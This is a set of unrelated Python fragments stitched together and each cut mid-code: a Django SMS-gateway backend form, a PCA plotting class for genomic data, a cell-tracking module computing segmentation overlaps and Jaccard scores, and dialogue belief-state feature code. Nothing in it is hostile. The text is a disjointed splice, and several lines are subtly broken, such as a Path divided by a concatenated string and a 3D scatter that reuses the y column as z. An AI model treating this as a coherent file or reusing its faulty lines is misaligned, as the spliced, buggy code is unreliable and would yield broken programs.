'give_other_domains_access', '', data_bind="checked: share_backend"
)
),
crispy.Div(
'authorized_domains',
data_bind="visible: showAuthorizedDomains",
),
])
if self._cchq_backend_id:
backend = SQLMobileBackend.load(self._cchq_backend_id)
if backend.show_inbound_api_key_during_edit:
self.fields['inbound_api_key'].initial = backend.inbound_api_key
fields.append(crispy.Field('inbound_api_key'))
return fields
def __init__(self, *args, **kwargs):
button_text = kwargs.pop('button_text', _("Create SMS Gateway"))
self._cchq_domain = kwargs.pop('domain')
self._cchq_backend_id = kwargs.pop('backend_id')
super(BackendForm, self).__init__(*args, **kwargs)
self.helper = HQFormHelper()
self.helper.form_method = 'POST'
self.helper.layout = crispy.Layout(
crispy.Fieldset(
_('General Settings'),
*self.general_fields
),
self.gateway_specific_fields,
crispy.Fieldset(
_("Phone Numbers"),
crispy.Div(
data_bind="template: {"
" name: 'ko-load-balancing-template', "
" data: $data"
"}",
),
data_bind="visible: use_load_balancing",
),
hqcrispy.FormActions(
StrictButton(
button_text,
type="submit",
css_class='btn-primary'
),
),
)
if self._cchq_backend_id:
# When editing, don't allow changing the name because name might be
# referenced as a contact-level backend preference.
# By setting disabled to True, Django makes sure the value won't change
# even if something else gets posted.
self.fields['name'].disabled = True
@property
def gateway_specific_fields(self):
return crispy.Div()
def clean_name(self):
value = self.cleaned_data.get("name")
if value is not None:
value = value.strip().upper()
if value is None or value == "":
raise ValidationError(_("This field is required."))
if re.compile(r"\s").search(value) is not None:
raise ValidationError(_("Name may not contain any spaces."))
if self.is_global_backend:
# We're using the form to create a global backend, so
# ensure name is not duplicated among other global backends
is_unique = SQLMobileBackend.name_is_unique(
value,
backend_id=self._cchq_backend_id
)
else:
# We're using the form to create a domain-level backend, so
# ensure name is not duplicated among other backends owned by this domain
is_unique = SQLMobileBackend.name_is_unique(
value,
domain=self._cchq_domain,
backend_id=self._cchq_backend_id
)
if not is_unique:
raise ValidationError(_("Name is already in use."))
return value
def clean_authorized_domains(self):
if not self.cleaned_data.get("give_other_domains_access"):
return []
else:
value = self.cleaned_data.get("authorized_domains")
if value is None or value.strip() == "":
return []
else:
return [domain.strip() for domain in value.split(",")]
def clean_reply_to_phone_number(self):
value = self.cleaned_data.get("reply_to_phone_number")
if value is None:
return None
else:
value = value.strip()
if value == "":
return None
else:
return value
class BackendMapForm(Form):
catchall_backend_id = ChoiceField(
label=ugettext_lazy("Catch-All Gateway"),
required=False
)
backend_map = CharField(required=False)
def __init__(self, *args, **kwargs):
backends = kwargs.pop('backends')
super(BackendMapForm, self).__init__(*args, **kwargs)
self.set_catchall_choices(backends)
self.setup_crispy()
def set_catchall_choices(self, backends):
backend_choices = [('', _("(none)"))]
backend_choices.extend([
(backend.pk, backend.name) for backend in backends
])
self.fields['catchall_backend_id'].choices = backend_choices
def setup_crispy(self):
self.helper = HQFormHelper()
self.helper.form_method = 'POST'
self.helper.layout = crispy.Layout(
crispy.Fieldset(
_("Default Gateways"),
hqcrispy.B3MultiField(
_("Default Gateway by Prefix"),
hqcrispy.ErrorsOnlyField('backend_map'),
crispy.Div(
data_bind="template: {"
" name: 'ko-template-backend-map', "
" data: $data"
"}"
),
),
'catchall_backend_id',
),
hqcrispy.FormActions(
StrictButton(
_("Save"),
type="submit",
css_class='btn-primary'
),
),
)
def _clean_prefix(self, prefix):
try:
prefix = int(prefix)
if prefix <= 0:
raise ValueError()
except (ValueError, TypeError):
raise ValidationError(_("Please enter a positive number for the prefix."))
return str(prefix)
def _clean_backend_id(self, backend_id):
try:
backend_id = int(backend_id)
except (ValueError, TypeError):
raise ValidationError(_("Invalid Backend Specified."))
try:
backend = SQLMobileBackend.load(backend_id)
except:
raise ValidationError(_("Invalid Backend Specified."))
if (
backend.deleted or
not backend.is_global or
backend.backend_type != SQLMobileBackend.SMS
):
raise ValidationError(_("Invalid Backend Specified."))
return backend_id
def clean_backend_map(self):
value = self.cleaned_data.get('backend_map')
try:
value = json.loads(value)
except:
raise ValidationError(_("An unexpected error occurred. Please reload | |
that takes a dataframe or a
genomic region alternatively to calculate a PCA.
@df_or_gene Dataframe or GenomicRegion containing d-dimensional data
@columns Dataframe columns that contain the actual data
@classlabel_column column that contains class labels
@axis 1 if columns are instances, 0 if rows are instances
@k number of dimensions
"""
ML_Base.__init__(self, name, genes_or_df_or_loading_function, columns, dependencies, annotators, row_id_column, scaler, imputer, missing_value)
self.result_dir = Path('results') / 'PCA' / self.name
self.cache_dir = Path('cache') / 'pca' / self.name
self.result_dir.mkdir(parents = True, exist_ok = True)
self.cache_dir.mkdir(parents = True, exist_ok = True)
self.d = len(columns)
self.k = k
self.label_mangler = label_mangler
self.class_label_dict_or_function = class_label_dict_or_function
self.axis = axis
self.axis_label = 'principal component'
def fit_transform(self):
raise NotImplementedError()
def dump_transformed_matrix(self):
def dunp():
pass
pass
def plot_2d_projection(self, filename = None, color_callable = None, dependencies = [], class_order = None):
"""
This assumes that self.transformed_matrix is an array-like object with shape (n_samples, n_components)
"""
if filename is None:
outfile = self.result_dir / self.name+"_2D_projection.pdf"
else:
outfile = filename
if self.k < 2:
raise ValueError("No 2D projection possible with only %s components, set k >= 2." % self.k)
def plot():
if isinstance(self.class_label_dict_or_function, dict) or self.class_label_dict_or_function is None:
class_label_dict = self.class_label_dict_or_function
elif hasattr(self.class_label_dict_or_function, '__call__'):
class_label_dict = self.class_label_dict_or_function()
else:
raise ValueError("class_label_dict was of type {}".format(type(self.class_label_dict_or_function)))
markers = itertools.cycle(('o', 'v', '^', '*', 's', '+'))
figure = plt.figure(figsize=(8, 8))
ax_data = figure.add_subplot(111)
matrix_columns = ["{}_{}".format(self.axis_label, i) for i in range(2)]
df = pd.DataFrame(self.transformed_matrix[:,:2], columns = matrix_columns)
print(df.shape)
#1 if columns are instances, 0 if rows are instances
if self.axis == 1:
ids = self.columns
else:
ids = self.df[self.row_id_column].values
if class_label_dict is not None:
df['class_label'] = [class_label_dict[instance_id] for instance_id in ids]
if 'class_label' in df.columns:
if class_order is None:
labels = list(set(class_label_dict.values()))
else:
labels = class_order
for i, label in enumerate(labels):
df_sub = df[df['class_label'] == label][matrix_columns]
matrix_sub = df_sub.as_matrix()
ax_data.plot(matrix_sub[:,0],matrix_sub[:,1], marker = next(markers), markersize=7, alpha=0.5, label=label, linestyle="None")
plt.title('Transformed samples with class labels')
else:
color = 'blue'
if color_callable is not None:
color = color_callable(ids)
ax_data.scatter(self.transformed_matrix[:,0], self.transformed_matrix[:,1], marker = 'o', c=color, cmap = 'plasma', alpha=0.5)
plt.title('Transformed samples without classes')
xmin = np.floor(np.min(self.transformed_matrix[:,0]))
ymin = np.floor(np.min(self.transformed_matrix[:,1]))
xmax = np.ceil(np.max(self.transformed_matrix[:,0]))
ymax = np.ceil(np.max(self.transformed_matrix[:,1]))
ax_data.set_xlim([1.3*xmin, 1.3*xmax])
ax_data.set_ylim([1.3*ymin, 1.3*ymax])
ax_data.set_xlabel('1st %s'%self.axis_label)
ax_data.set_ylabel('2nd %s'%self.axis_label)
ax_data.legend()
for i, instance_id in enumerate(ids):
plt.annotate(
self.label_mangler(instance_id),
xy = (self.transformed_matrix[i,0], self.transformed_matrix[i,1]), xytext = (-1, 1),
textcoords = 'offset points', ha = 'right', va = 'bottom', size = 3)
figure.savefig(outfile)
return ppg.FileGeneratingJob(outfile, plot).depends_on(self.fit_transform()).depends_on(self.init_data_matrix()).depends_on(self.load()).depends_on(dependencies)
def plot_3d_projection(self, filename = None, color_callable = None, dependencies = [], class_order = None):
"""
This assumes that self.transformed_matrix is an array-like object with shape (n_samples, n_components)
"""
if self.k < 3:
raise ValueError("No 3D prjection possible with only %s components, set k >= 3." % self.k)
if filename is None:
outfile = os.path.join(self.result_dir, self.name+"_3D_projection.pdf")
else:
outfile = filename
def plot():
if isinstance(self.class_label_dict_or_function, dict) or self.class_label_dict_or_function is None:
class_label_dict = self.class_label_dict_or_function
elif hasattr(self.class_label_dict_or_function, '__call__'):
class_label_dict = self.class_label_dict_or_function()
else:
raise ValueError("class_label_dict was of type {}".format(type(self.class_label_dict_or_function)))
markers = itertools.cycle(('o', 'v', '^', '*', 's', '+'))
figure = plt.figure(figsize=(8, 8))
ax3d = figure.add_subplot(111, projection = '3d')
matrix_columns = ["{}_{}".format(self.axis_label, i) for i in range(3)]
df = pd.DataFrame(self.transformed_matrix[:,:3], columns = matrix_columns)
#1 if columns are instances, 0 if rows are instances
if self.axis == 1:
ids = self.columns
else:
ids = self.df[self.row_id_column].values
if class_label_dict is not None:
df['class_label'] = [class_label_dict[instance_id] for instance_id in ids]
if 'class_label' in df.columns:
if class_order is None:
labels = list(set(class_label_dict.values()))
else:
labels = class_order
for i, label in enumerate(labels):
df_sub = df[df['class_label'] == label][matrix_columns]
matrix_sub = df_sub.as_matrix()
ax3d.plot(
matrix_sub[:,0],
matrix_sub[:,1],
matrix_sub[:,2],
marker = next(markers),
markersize=7,
alpha=0.5,
label=label,
linestyle="None"
)
plt.title('Transformed samples with class labels')
else:
color = 'blue'
if color_callable is not None:
color = color_callable(ids)
ax3d.scatter(
self.transformed_matrix[:,0],
self.transformed_matrix[:,1],
self.transformed_matrix[:,1],
marker = 'o',
c=color,
cmap = 'plasma',
alpha=0.5
)
plt.title('Transformed samples without classes')
xmin = np.floor(np.min(self.transformed_matrix[:,0]))
ymin = np.floor(np.min(self.transformed_matrix[:,1]))
zmin = np.floor(np.min(self.transformed_matrix[:,2]))
xmax = np.ceil(np.max(self.transformed_matrix[:,0]))
ymax = np.ceil(np.max(self.transformed_matrix[:,1]))
zmax = np.ceil(np.max(self.transformed_matrix[:,2]))
ax3d.set_xlim([1.3*xmin, 1.3*xmax])
ax3d.set_ylim([1.3*ymin, 1.3*ymax])
ax3d.set_zlim([1.3*zmin, 1.3*zmax])
ax3d.set_xlabel('1st %s'%self.axis_label)
ax3d.set_ylabel('2nd %s'%self.axis_label)
ax3d.set_zlabel('3rd %s'%self.axis_label)
ax3d.legend()
for i, instance_id in enumerate(ids):
plt.annotate(
instance_id,
xy = (self.transformed_matrix[i,0], self.transformed_matrix[i,1]), xytext = (-1, 1),
textcoords = 'offset points', ha = 'right', va = 'bottom', size = 3)
ax3d.text(self.transformed_matrix[i,0],self.transformed_matrix[i,1],self.transformed_matrix[i,2], '%s' % (self.label_mangler(instance_id)), size=3, zorder=1, color='k')
figure.savefig(outfile)
return ppg.FileGeneratingJob(outfile, plot).depends_on(self.fit_transform()).depends_on(self.init_data_matrix()).depends_on(self.load()).depends_on(dependencies)
def plot_3d_data(self):
"""
This is for plotting the data directly, assuming that it is 3D ... for testing purposes.
"""
filename = os.path.join(self.result_dir, self.name + "3d_data.pdf")
def plot():
colors = ['blue', 'red', 'green', 'orange', 'purple', 'cyan']
markers = ['o', 'v', '^', '*', 's', '+']
figure = plt.figure(figsize=(10, 10))
ax3d = figure.add_subplot(111, projection = '3d')
if self.class_label_dict is not None:
last = 0
for i, class_label in enumerate(self.class_label_dict):
l = len(self.class_label_dict[class_label])
ax3d.plot(
self.matrix[last:last+l,0],
self.matrix[last:last+l,1],
self.matrix[last:last+l,2],
markers[i],
markersize=7,
color=colors[i],
alpha=0.5,
label=class_label
)
last = last+l
plt.title('Transformed samples with class labels')
else:
ax3d.plot(
self.transformed_matrix[:,0],
self.transformed_matrix[:,1],
self.transformed_matrix[:,2],
'o',
markersize=7,
color='blue',
alpha=0.5
)
plt.title('Transformed samples without classes')
xmin = np.floor(np.min(self.transformed_matrix[:,0]))
ymin = np.floor(np.min(self.transformed_matrix[:,1]))
zmin = np.floor(np.min(self.transformed_matrix[:,2]))
xmax = np.ceil(np.max(self.transformed_matrix[:,0]))
ymax = np.ceil(np.max(self.transformed_matrix[:,1]))
zmax = np.ceil(np.max(self.transformed_matrix[:,2]))
ax3d.set_xlim([2*xmin, 2*xmax])
ax3d.set_ylim([2*ymin, 2*ymax])
ax3d.set_zlim([2*zmin, 2*zmax])
ax3d.set_xlabel('%s %i'%(self.axis_label, 1))
ax3d.set_ylabel('%s %i'%(self.axis_label, 2))
ax3d.set_zlabel('%s %i'%(self.axis_label, 3))
ax3d.legend()
figure.savefig(filename)
return ppg.FileGeneratingJob(filename, plot).depends_on(self.fit_transform()).depends_on(self.init_data_matrix())
def plot_jitter_component(self, filename = None, df_colors = None, component = 1, bins = 30, axis_label = 'component', class_order = None, styles = ['histogram', 'swarm', 'distribution', 'splines']):
if filename is None:
filename = os.path.join(self.result_dir, self.name + "component_projection_%i.pdf" % component)
def plot():
import seaborn as sns
if isinstance(self.class_label_dict_or_function, dict) or self.class_label_dict_or_function is None:
class_label_dict = self.class_label_dict_or_function
elif hasattr(self.class_label_dict_or_function, '__call__'):
class_label_dict = self.class_label_dict_or_function()
else:
raise ValueError("class_label_dict was of type {}".format(type(self.class_label_dict_or_function)))
#calc
embedding = self.transformed_matrix
df = pd.DataFrame({'1' : embedding[:,0], '2' : embedding[:,1], '3' : embedding[:,2]})
x = sorted(embedding[:,component])
max_value = np.max(x)
min_value = np.min(x)
rangeX = [min_value, max_value]
width = (rangeX[1] - rangeX[0]) / bins
df.to_csv(filename+'.tsv', sep = '\t', index = False)
if df_colors is not None:
df['color'] = df_colors['color'].values
elif class_label_dict is not None:
if self.axis == 1:
ids = self.columns
else:
ids = self.df[self.row_id_column].values
labels = [class_label_dict[instance_id] for instance_id in ids]
df['color'] = labels
else:
df['color'] = ['b']*len(df)
#plot
df = df.sort_values(str(component))
if class_order is None:
colors = set(df['color'].values)
else:
colors = class_order
fig, axes = plt.subplots(len(styles), sharex = True, figsize = (8, len(styles)*3))
for i, style in enumerate(styles):
if style == 'histogram':
axes[i].hist(
[df[df['color'] == c][str(component)].values for c in colors],
bins = bins,
width = width,
range = rangeX,
density = False,
histtype = 'barstacked',
label = colors
)
axes[i].set_title('Histogram')
axes[i].legend()
elif style == 'swarm':
sns.swarmplot(x = df[str(component)], y=[""]*len(df), hue = df['color'], hue_order = colors, ax=axes[i])
#axes[i].get_legend().remove()
axes[i].set_title('Projection of %s %s' % (axis_label, component))
elif style == 'distribution':
for c in colors:
values = df[df['color'] == c][str(component)].values
histogram = np.histogram(sorted(values), bins = bins, range = rangeX, density = False)
distribution = scipy.stats.rv_histogram(histogram)
fitted_pdf = distribution.pdf(x)
axes[i].plot(x, fitted_pdf)
axes[i].set_title('Fitted distribution')
elif style == 'splines':
for c in colors:
values = df[df['color'] == c][str(component)].values
histogram = np.histogram(sorted(values), bins = bins, range = rangeX, density = False)
spl = interp1d(histogram[1][:-1], histogram[0], kind='cubic', fill_value = 0, bounds_error = False)
axes[i].plot(x, spl(x), label = c)
plt.legend()
axes[i].set_title('Cubic spline interpolation')
else:
raise ValueError('Unknown style {}. Use any or all of [histogram, swarm, distribution, splines].')
plt.suptitle('Projection of %s %s.' % (axis_label, component), y = 1)
plt.tight_layout()
fig.savefig(filename)
return ppg.FileGeneratingJob(filename, plot).depends_on(self.fit_transform()).depends_on(self.init_data_matrix()).depends_on(self.load())
def plot_variance(self):
"""
Plots explained variance for each component.
"""
filename = os.path.join(self.result_dir, self.name + "variance.pdf")
def plot():
fig = plt.figure(figsize = (5, 5))
explained_variance = self.model.explained_variance_
x = np.array(range(len(explained_variance)), dtype = int)
plt.bar(x, explained_variance)
plt.title('Explained variance of the components')
plt.gca().set_xlabels(['%i %s' % (ii, self.axis_label) for ii in range(explained_variance)])
plt.tight_layout()
fig.savefig(filename)
return ppg.FileGeneratingJob(filename, plot).depends_on(self.fit_transform())
def dump_correlation(self, genes, columns, dependencies = [], annotators = []):
outfile = genes.result_dir / f"{self.name}_correlation.tsv"
def dump():
to_df = {'stable_id' : [], 'name' : []}
| |
import numpy as np
import logging
import time
import concurrent.futures
from hytra.core.probabilitygenerator import (
IlpProbabilityGenerator,
computeDivisionFeaturesOnCloud,
computeRegionFeaturesOnCloud,
DummyExecutor,
)
from hytra.util.progressbar import ProgressBar
logger = logging.getLogger(__name__)
def findConflictingHypothesesInSeparateProcess(
frame,
labelImageFilenames,
labelImagePaths,
labelImageFrameIdToGlobalId,
pluginPaths=["hytra/plugins"],
imageProviderPluginName="LocalImageLoader",
):
"""
Look which objects between different segmentation hypotheses (given as different labelImages)
overlap, and return a dictionary of those overlapping situations.
Meant to be run in its own process using `concurrent.futures.ProcessPoolExecutor`
"""
# set up plugin manager
from hytra.pluginsystem.plugin_manager import TrackingPluginManager
pluginManager = TrackingPluginManager(pluginPaths=pluginPaths, verbose=False)
pluginManager.setImageProvider(imageProviderPluginName)
overlaps = {} # overlap dict: key=globalId, value=[list of globalIds]
for labelImageIndexA in range(len(labelImageFilenames)):
labelImageA = pluginManager.getImageProvider().getLabelImageForFrame(
labelImageFilenames[labelImageIndexA],
labelImagePaths[labelImageIndexA],
frame,
)
for labelImageIndexB in range(labelImageIndexA + 1, len(labelImageFilenames)):
labelImageB = pluginManager.getImageProvider().getLabelImageForFrame(
labelImageFilenames[labelImageIndexB],
labelImagePaths[labelImageIndexB],
frame,
)
# check for overlaps - even a 1-pixel overlap is enough to be mutually exclusive!
for objectIdA in np.unique(labelImageA):
if objectIdA == 0:
continue
overlapping = set(np.unique(labelImageB[labelImageA == objectIdA])) - set([0])
overlappingGlobalIds = [
labelImageFrameIdToGlobalId[(labelImageFilenames[labelImageIndexB], frame, o)] for o in overlapping
]
globalIdA = labelImageFrameIdToGlobalId[(labelImageFilenames[labelImageIndexA], frame, objectIdA)]
overlaps.setdefault(globalIdA, []).extend(overlappingGlobalIds)
for globalIdB in overlappingGlobalIds:
overlaps.setdefault(globalIdB, []).append(globalIdA)
return frame, overlaps
def computeJaccardScoresOnCloud(
frame,
labelImageFilenames,
labelImagePaths,
labelImageFrameIdToGlobalId,
groundTruthFilename,
groundTruthPath,
groundTruthMinJaccardScore,
pluginPaths=["hytra/plugins"],
imageProviderPluginName="LocalImageLoader",
):
"""
Compute jaccard scores of all objects in the different segmentations with the ground truth for that frame.
Returns a dictionary of overlapping GT labels and the score per globalId in that frame, as well as
a dictionary specifying the matching globalId and score for every GT label (as a list ordered by score, best match last).
Meant to be run in its own process using `concurrent.futures.ProcessPoolExecutor`
"""
# set up plugin manager
from hytra.pluginsystem.plugin_manager import TrackingPluginManager
pluginManager = TrackingPluginManager(pluginPaths=pluginPaths, verbose=False)
pluginManager.setImageProvider(imageProviderPluginName)
scores = {}
gtToGlobalIdMap = {}
groundTruthLabelImage = pluginManager.getImageProvider().getLabelImageForFrame(
groundTruthFilename, groundTruthPath, frame
)
for labelImageIndexA in range(len(labelImageFilenames)):
labelImageA = pluginManager.getImageProvider().getLabelImageForFrame(
labelImageFilenames[labelImageIndexA],
labelImagePaths[labelImageIndexA],
frame,
)
# check for overlaps - even a 1-pixel overlap is enough to be mutually exclusive!
for objectIdA in np.unique(labelImageA):
if objectIdA == 0:
continue
globalIdA = labelImageFrameIdToGlobalId[(labelImageFilenames[labelImageIndexA], frame, objectIdA)]
overlap = groundTruthLabelImage[labelImageA == objectIdA]
overlappingGtElements = set(np.unique(overlap)) - set([0])
for gtLabel in overlappingGtElements:
# compute Jaccard scores
intersectingPixels = np.sum(overlap == gtLabel)
unionPixels = np.sum(np.logical_or(groundTruthLabelImage == gtLabel, labelImageA == objectIdA))
jaccardScore = float(intersectingPixels) / float(unionPixels)
# append to object's score list
scores.setdefault(globalIdA, []).append((gtLabel, jaccardScore))
# store this as GT mapping if there was no better object for this GT label yet
if jaccardScore > groundTruthMinJaccardScore and (
(frame, gtLabel) not in gtToGlobalIdMap or gtToGlobalIdMap[(frame, gtLabel)][-1][1] < jaccardScore
):
gtToGlobalIdMap.setdefault((frame, gtLabel), []).append((globalIdA, jaccardScore))
# sort all gt mappings by ascending jaccard score
for _, v in gtToGlobalIdMap.items():
v.sort(key=lambda x: x[1])
return frame, scores, gtToGlobalIdMap
class ConflictingSegmentsProbabilityGenerator(IlpProbabilityGenerator):
"""
Specialization of the probability generator that computes all the features on its own,
to have more than one segmentation hypotheses per timeframe.
First step: make sure that objects from different hypotheses have different IDs
* do that by adding the maxId of the "previous" segmentation hypothesis for that frame
* store reference which hypothesis this segment comes from in Traxel, so that we can
reconstruct a result from the graph and images
"""
def __init__(
self,
ilpOptions,
additionalLabelImageFilenames,
additionalLabelImagePaths,
turnOffFeatures=[],
useMultiprocessing=True,
pluginPaths=["hytra/plugins"],
verbose=False,
):
""" """
super(ConflictingSegmentsProbabilityGenerator, self).__init__(
ilpOptions, turnOffFeatures, useMultiprocessing, pluginPaths, verbose
)
# store the additional segmentation hypotheses and check that they are of the same size
self._labelImageFilenames = additionalLabelImageFilenames
self._labelImagePaths = additionalLabelImagePaths
for filename, path in zip(self._labelImageFilenames, self._labelImagePaths):
assert self._pluginManager.getImageProvider().getImageShape(filename, path) == self.shape
assert self._pluginManager.getImageProvider().getTimeRange(filename, path) == self.timeRange
self._labelImageFilenames.insert(0, ilpOptions.labelImageFilename)
self._labelImagePaths.insert(0, ilpOptions.labelImagePath)
self._labelImageFrameIdToGlobalId = {} # map from (labelImageFilename, frame, id) to (id)
def fillTraxels(self, usePgmlink=True, ts=None, fs=None, dispyNodeIps=[], turnOffFeatures=[]):
"""
Compute all the features and predict object count as well as division probabilities.
Store the resulting information (and all other features) inside `self.TraxelsPerFrame`.
It also computes which of the segmentation hypotheses overlap and are mutually exclusive, and stores
that per traxel, in each traxel's `conflictingTraxelIds` list. (Can only conflict within the timeframe)
WARNING: usePgmlink is not supported for this derived class, so must be `False`!
WARNING: distributed computation via Dispy is not supported here, so dispyNodeIps must be an empty list!
"""
assert not usePgmlink
assert len(dispyNodeIps) == 0
super(ConflictingSegmentsProbabilityGenerator, self).fillTraxels(
usePgmlink, ts, fs, dispyNodeIps, turnOffFeatures
)
self._findOverlaps()
def _findOverlaps(self):
"""
Check which objects are overlapping between the different segmentation hypotheses,
and store that information in every traxel.
"""
logger.info("Checking for overlapping segmentation hypotheses...")
t0 = time.time()
# find exclusion constraints
if self._useMultiprocessing:
# use ProcessPoolExecutor, which instanciates as many processes as there CPU cores by default
ExecutorType = concurrent.futures.ProcessPoolExecutor
logger.info("Parallelizing via multiprocessing on all cores!")
else:
ExecutorType = DummyExecutor
logger.info("Running on single core!")
jobs = []
progressBar = ProgressBar(stop=self.timeRange[1] - self.timeRange[0])
progressBar.show(increase=0)
with ExecutorType() as executor:
for frame in range(self.timeRange[0], self.timeRange[1]):
jobs.append(
executor.submit(
findConflictingHypothesesInSeparateProcess,
frame,
self._labelImageFilenames,
self._labelImagePaths,
self._labelImageFrameIdToGlobalId,
self._pluginPaths,
)
)
for job in concurrent.futures.as_completed(jobs):
progressBar.show()
frame, overlaps = job.result()
for objectId, overlapIds in overlaps.items():
if self.TraxelsPerFrame[frame][objectId].conflictingTraxelIds is None:
self.TraxelsPerFrame[frame][objectId].conflictingTraxelIds = []
self.TraxelsPerFrame[frame][objectId].conflictingTraxelIds.extend(overlapIds)
t1 = time.time()
logger.info("Finding overlaps took {} secs".format(t1 - t0))
def findGroundTruthJaccardScoreAndMapping(
self,
hypothesesGraph,
groundTruthSegmentationFilename=None,
groundTruthSegmentationPath=None,
groundTruthTextFilename=None,
groundTruthMinJaccardScore=0.5,
):
"""
Find the overlap between all objects in the given segmentations with the groundtruth,
and store that jaccard score in each traxel's features.
**Returns** a solution dictionary in our JSON format, which fits to the given hypotheses graph.
TODO: simplify this method!
Currently there are 4 different sets of IDs to reference nodes:
* the ground truth trackId
* a corresponding globalId (which is unique within a frame across different segmentation hypotheses)
* an objectId (which equals the labelId within one segmentation hypotheses)
* a globally unique UUID as used in the JSON files
The nodes in the hypotheses graph are indexed by (frame, globalId), the resulting dict must use UUIDs.
"""
logger.info("Computing Jaccard scores w.r.t. GroundTruth ...")
t0 = time.time()
# find exclusion constraints
if self._useMultiprocessing:
# use ProcessPoolExecutor, which instanciates as many processes as there CPU cores by default
ExecutorType = concurrent.futures.ProcessPoolExecutor
logger.info("Parallelizing via multiprocessing on all cores!")
else:
ExecutorType = DummyExecutor
logger.info("Running on single core!")
jobs = []
progressBar = ProgressBar(stop=self.timeRange[1] - self.timeRange[0])
progressBar.show(increase=0)
gtFrameIdToGlobalIdsWithScoresMap = {}
with ExecutorType() as executor:
for frame in range(self.timeRange[0], self.timeRange[1]):
jobs.append(
executor.submit(
computeJaccardScoresOnCloud,
frame,
self._labelImageFilenames,
self._labelImagePaths,
self._labelImageFrameIdToGlobalId,
groundTruthSegmentationFilename,
groundTruthSegmentationPath,
groundTruthMinJaccardScore,
self._pluginPaths,
)
)
for job in concurrent.futures.as_completed(jobs):
progressBar.show()
frame, scores, frameGtToGlobalIdMap = job.result()
for objectId, individualScores in scores.items():
self.TraxelsPerFrame[frame][objectId].Features["JaccardScores"] = individualScores
gtFrameIdToGlobalIdsWithScoresMap.update(frameGtToGlobalIdMap)
t1 = time.time()
logger.info("Finding jaccard scores took {} secs".format(t1 - t0))
# create JSON result by mapping it to the hypotheses graph
traxelIdPerTimestepToUniqueIdMap, _ = hypothesesGraph.getMappingsBetweenUUIDsAndTraxels()
detectionResults = []
for (
gtFrameAndId,
globalIdsAndScores,
) in gtFrameIdToGlobalIdsWithScoresMap.items():
detectionResults.append(
{
"id": traxelIdPerTimestepToUniqueIdMap[str(gtFrameAndId[0])][str(globalIdsAndScores[-1][0])],
"value": 1,
}
)
# read tracks from textfile
with open(groundTruthTextFilename, "r") as tracksFile:
lines = tracksFile.readlines()
tracks = [[int(x) for x in line.strip().split(" ")] for line in lines]
# order them by track start time and process track by track
tracks.sort(key=lambda x: x[1])
linkingResults = []
descendants = {}
missingLinks = 0
def checkLinkExists(gtSrc, gtDest):
# first check that both GT nodes have been mapped to a hypotheses
if gtSrc in gtFrameIdToGlobalIdsWithScoresMap:
src = (gtSrc[0], gtFrameIdToGlobalIdsWithScoresMap[gtSrc][-1][0])
else:
logger.warning("GT link's source node {} has no match in the segmentation hypotheses".format(gtSrc))
return False
if gtDest in gtFrameIdToGlobalIdsWithScoresMap:
dest = (gtDest[0], gtFrameIdToGlobalIdsWithScoresMap[gtDest][-1][0])
else:
logger.warning(
"GT link's destination node {} has no match in the segmentation hypotheses".format(gtDest)
)
return False
# then map them to the hypotheses graph
if not hypothesesGraph.hasNode(src):
logger.warning("Source node of GT link {} was not found in graph".format((gtSrc, gtDest)))
return False
if not hypothesesGraph.hasNode(dest):
logger.warning("Destination node of GTlink {} was not found in graph".format((gtSrc, gtDest)))
return False
if not hypothesesGraph.hasEdge(src, dest):
logger.warning("Nodes are present, but GT link {} was not found in graph".format((gtSrc, gtDest)))
return False
return True
def gtIdPerFrameToUuid(frame, gtId):
return traxelIdPerTimestepToUniqueIdMap[str(frame)][
str(gtFrameIdToGlobalIdsWithScoresMap[(frame, gtId)][-1][0])
]
# add links of all tracks
for track in tracks:
trackId, startFrame, endFrame, parent = track
if parent != 0:
descendants.setdefault(parent, []).append((startFrame, trackId))
# add transitions along track
for frame in range(startFrame, min(endFrame, self.timeRange[1])):
if not checkLinkExists((frame, trackId), (frame | |
list(belief['beliefs']['requested'].values())])
ret_vec = [0] * 5
if n_requested > 4:
n_requested = 4
ret_vec[n_requested] = 1.
return ret_vec
def convert_joint_slot_b(self, belief):
"""
Extracts the features for the joint vector of all the slots
:param belief: The full belief state
:return: The joint slot vector
"""
#ic340 note: this should probably be done with an rnn encoder
if type(belief) == DialogueState.DialogueState:
belief = belief.domainStates[belief.currentdomain]
joint_beliefs = []
joint_none = 1.
informable_beliefs = [copy.deepcopy(belief['beliefs'][x]) for x in list(belief['beliefs'].keys()) if
x in self.slots] # this might be inneficent
for i, b in enumerate(informable_beliefs):
joint_none *= b['**NONE**']
del b['**NONE**'] # should I put **NONE** prob mass to dontcare?
informable_beliefs[i] = sorted([x for x in list(b.values()) if x != 0], reverse=True)[:2]
while len(informable_beliefs[i]) < 2:
informable_beliefs[i].append(0.)
for probs in product(*informable_beliefs):
joint_beliefs.append(np.prod(probs))
first_joint_beliefs = -np.ones(20)
joint_beliefs = joint_beliefs[:20]
len_joint_beliefs = len(joint_beliefs)
first_joint_beliefs[:len_joint_beliefs] = joint_beliefs
if sum(first_joint_beliefs) == 0:
first_joint_beliefs = list(np.ones(len(first_joint_beliefs)) / len(first_joint_beliefs))
else:
first_joint_beliefs = list(np.array(first_joint_beliefs) / sum(first_joint_beliefs)) # why normalise?
# number of slots which are not **NONE**
n = 0
for key in belief['beliefs']:
if key in self.slots:
none_val = belief['beliefs'][key]['**NONE**']
top_val = np.max(
[belief['beliefs'][key][value] for value in list(belief['beliefs'][key].keys()) if value != '**NONE**'])
if top_val > none_val:
n += 1
not_none = [0.] * 5
if n > 4:
n = 4
not_none[n] = 1.
return [joint_none] + first_joint_beliefs + not_none
def convert_slot_b(self, belief, slot):
"""
Extracts the slot features by padding the distribution vector with -1s.
:param belief: The full belief state
:return: The slot DIP vector
"""
if type(belief) == DialogueState.DialogueState:
belief = belief.domainStates[belief.currentdomain]
if self.sortbelief is True:
b = [belief['beliefs'][slot]['**NONE**']] + sorted(
[belief['beliefs'][slot][value] for value in list(belief['beliefs'][slot].keys()) if value != '**NONE**'],
reverse=True) # sorted values
else:
b = [belief['beliefs'][slot]['**NONE**']] + \
[belief['beliefs'][slot][value] for value in list(belief['beliefs'][slot].keys()) if value != '**NONE**'] # unsorted values
assert len(b) <= self.max_v -1, 'length of bstate ({}) is longer than self.max_v ({})'.format(len(b), self.max_v-1)
padded_b = -np.ones(self.max_v)
padded_b[0] = 0.
padded_b[1:len(b)+1] = b
return padded_b
def _get_val_dist_in_DB(self, slot):
# The entropy of the normalised histogram (|DB(s=v)|/|DB|) \forall v \in V_s
values = Ontology.global_ontology.get_informable_slot_values(self.domainString, slot)
entities = Ontology.global_ontology.entity_by_features(self.domainString, {})
val_dist = np.zeros(len(values))
